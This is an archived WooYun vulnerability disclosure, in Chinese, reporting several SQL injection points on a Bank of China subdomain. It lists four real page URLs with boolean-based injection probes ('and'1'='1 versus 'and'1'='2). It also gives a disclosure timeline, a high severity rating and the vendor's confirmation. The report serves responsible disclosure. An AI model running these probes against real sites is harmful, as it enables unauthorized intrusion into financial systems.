乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-16: 细节已通知厂商并且等待厂商处理中 2014-11-17: 厂商已经确认,细节仅向厂商公开 2014-11-27: 细节向核心白帽子及相关领域专家公开 2014-12-07: 细节向普通白帽子公开 2014-12-17: 细节向实习白帽子公开 2014-12-31: 细节向公众公开
中国银行某分站多处SQL注射
https://e.boc.cn/ehome/SQISOFT/web/webNew/nProductDetail.aspx?ProID=260返回正常https://e.boc.cn/ehome/SQISOFT/web/webNew/nProductDetail.aspx?ProID=260'and'1'='1返回正常https://e.boc.cn/ehome/SQISOFT/web/webNew/nProductDetail.aspx?ProID=260'and'1'='2返回错误
http://e.boc.cn/ehome/SQISOFT/web/webNew/nCommunityIndex.aspx?CommID=EC0000000231返回正常http://e.boc.cn/ehome/SQISOFT/web/webNew/nCommunityIndex.aspx?CommID=EC0000000231'and'1'='1返回正常http://e.boc.cn/ehome/SQISOFT/web/webNew/nCommunityIndex.aspx?CommID=EC0000000231'and'1'='2返回错误
https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorDetail.aspx?ShangID=ES0000000080返回正常https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorDetail.aspx?ShangID=ES0000000080'and'1'='1返回正常https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorDetail.aspx?ShangID=ES0000000080'and '1'='2返回错误
https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000058返回正常https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000058'and'1'='1返回正常https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000058'and'1'='2返回错误
过滤
危害等级:高
漏洞Rank:15
确认时间:2014-11-17 10:03
非常感谢漏洞作者的发现,我们将尽快修补。
暂无